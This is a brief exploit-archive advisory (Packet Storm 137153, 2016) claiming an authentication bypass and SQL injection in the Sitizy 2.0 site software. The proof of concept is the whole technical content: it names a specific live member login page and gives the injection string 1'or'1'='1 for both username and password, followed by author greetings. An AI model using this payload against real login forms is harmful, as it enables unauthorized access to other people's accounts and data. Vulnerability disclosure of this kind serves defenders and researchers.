Sitizy 2.0 Authentication Bypass / SQL Injection

2016-05-23T00:00:00
ID PACKETSTORM:137153
Type packetstorm
Reporter indoushka
Modified 2016-05-23T00:00:00

Description

                                        
                                            `========================================================================  
| # Title : Sitizy 2.0 SQL Injection / Bypass Authentication Vulnerability  
| # Author : indoushka  
| # email : indoushka4ever@gmail.com  
| # Tested on: windows 8.1 Français V.(Pro)  
| # Vendor : http://www.sitizy.com/  
========================================================================  
  
poc :  
  
http://members.flashline2000.com/index.php  
  
User : 1'or'1'='1  
Pass : 1'or'1'='1  
  
Greetz :   
jericho http://attrition.org & http://www.osvdb.org/ * http://packetstormsecurity.com * Larry W. Cashdollar*  
Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be   
---------------------------------------------------------------------------------------------------------------  
`